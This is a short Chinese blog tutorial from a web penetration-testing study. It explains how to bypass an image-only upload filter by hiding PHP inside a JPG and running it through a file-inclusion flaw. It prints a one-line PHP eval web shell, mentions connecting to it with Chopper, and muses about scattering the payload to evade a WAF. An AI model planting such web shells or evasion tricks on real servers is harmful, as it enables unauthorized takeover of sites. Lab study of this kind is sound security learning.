图片木马---web渗透学习
在《文件上傳漏洞—Web滲透學習》一文中講到在高安全級別(有較強安全意識的開發人員)中,開放人員定義了用戶上傳文件的擴展名,只有文件擴展名是jpg、JPG、jpeg、JPEG等文件才允許上傳。通過代理服務器等方法無法對其進行滲透。
通過文件包含漏洞的滲透方法和文件上傳漏洞的方法結合,可以成功滲透文件上傳漏洞中的高安全級別。
原理:
我們在高安全級別中真實的長傳一張圖片,但在通過圖片編輯軟件,將php語句添加到該圖片中。
php語句如下:
然后通過文件包含來訪問該圖片,使該語句得到執行,從而生成shell50.php文件,文件內容為:
<?php eval($_POST['1']);?>上傳圖片:
通過文件包含訪問該圖片(顯示亂碼表示圖片上傳成功):
訪問的實質是通過include函數對執行上傳的圖片進行執行,從而生成shell50.php文件。
接下來用菜刀訪問該shell50.php文件,從而獲取該服務的文件操作權限。
后記:
在該實驗中進行了抓包,圖片上傳過程的數據包信息如下:
以下內容是我的想法,正確性目前還不能確定,有問題請高手指正。
在數據包中能夠很清楚的看到,在圖片中插入的php語句,通過WAF或者其他檢測方式應該很容易的阻攔該圖片的上傳。
設想:將php語句打亂在整個數據包的payload流中,從而繞過WAF的簡單檢查,應該有軟件能夠很容易的實現。
安全防護的解決方案:調用php對該文件進行執行,檢查其是否有危險的或不合理的代碼,如果有服務器丟棄或隔離該文件。
總結
以上是生活随笔為你收集整理的图片木马---web渗透学习的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: ata职业技能评价证书考出来有啥用?
- 下一篇: Android Studio-Didn'